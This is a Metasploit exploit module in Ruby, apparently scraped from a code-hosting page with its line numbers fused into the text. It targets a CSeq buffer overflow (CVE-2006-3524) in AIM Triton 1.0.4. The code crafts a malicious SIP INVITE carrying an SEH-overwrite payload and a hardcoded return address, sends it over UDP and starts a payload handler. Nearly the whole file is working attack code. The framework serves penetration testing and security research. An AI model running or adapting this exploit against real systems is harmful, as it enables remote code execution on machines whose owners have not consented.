Path: blob/master/modules/exploits/windows/sip/aim_triton_cseq.rb
19850 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::Udp9include Msf::Exploit::Remote::Seh1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'AIM Triton 1.0.4 CSeq Buffer Overflow',16'Description' => %q{17This module exploits a buffer overflow in AOL\'s AIM18Triton 1.0.4. By sending an overly long CSeq value,19a remote attacker could overflow a buffer and execute20arbitrary code on the system with the privileges of21the affected application.22},23'Author' => 'MC',24'References' => [25['CVE', '2006-3524'],26['OSVDB', '27122' ],27['BID', '18906'],28['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER],29['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION],30['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE]31],32'DefaultOptions' => {33'EXITFUNC' => 'seh',34},35'Payload' => {36'Space' => 400,37'BadChars' => "\x00\x0a\x20\x09\x0d",38'StackAdjustment' => -3500,39},40'Platform' => 'win',41'Targets' => [42[ 'AIM Triton 1.0.4 Universal', { 'Ret' => 0x4017b3d9 } ], # coolcore45.dll43],44'Privileged' => false,45'DisclosureDate' => '2006-07-10',46'DefaultTarget' => 0,47'Notes' => {48'Reliability' => UNKNOWN_RELIABILITY,49'Stability' => UNKNOWN_STABILITY,50'SideEffects' => UNKNOWN_SIDE_EFFECTS51}52)53)5455register_options(56[57Opt::RPORT(5061)58]59)60end6162def exploit63connect_udp6465user = rand_text_english(2, payload_badchars)66port = rand(65535).to_s67filler = rand_text_english(792, payload_badchars)68seh = generate_seh_payload(target.ret)69filler[780, seh.length] = seh7071sploit = "INVITE sip:#{user}\@127.0.0.1 SIP/2.0" + "\r\n"72sploit << "To: <sip:#{rhost}:#{rport}>" + "\r\n"73sploit << "Via: SIP/2.0/UDP #{rhost}:#{port}" + "\r\n"74sploit << "From: \"#{user}\"<sip:#{rhost}:#{port}>" + "\r\n"75sploit << "Call-ID: #{(rand(100) + 100)}#{rhost}" + "\r\n"76sploit << "CSeq: " + filler + "\r\n"77sploit << "Max-Forwards: 20" + "\r\n"78sploit << "Contact: <sip:127.0.0.1:#{port}>" + "\r\n\r\n"7980print_status("Trying target #{target.name}...")8182udp_sock.put(sploit)8384handler85disconnect_udp86end87end888990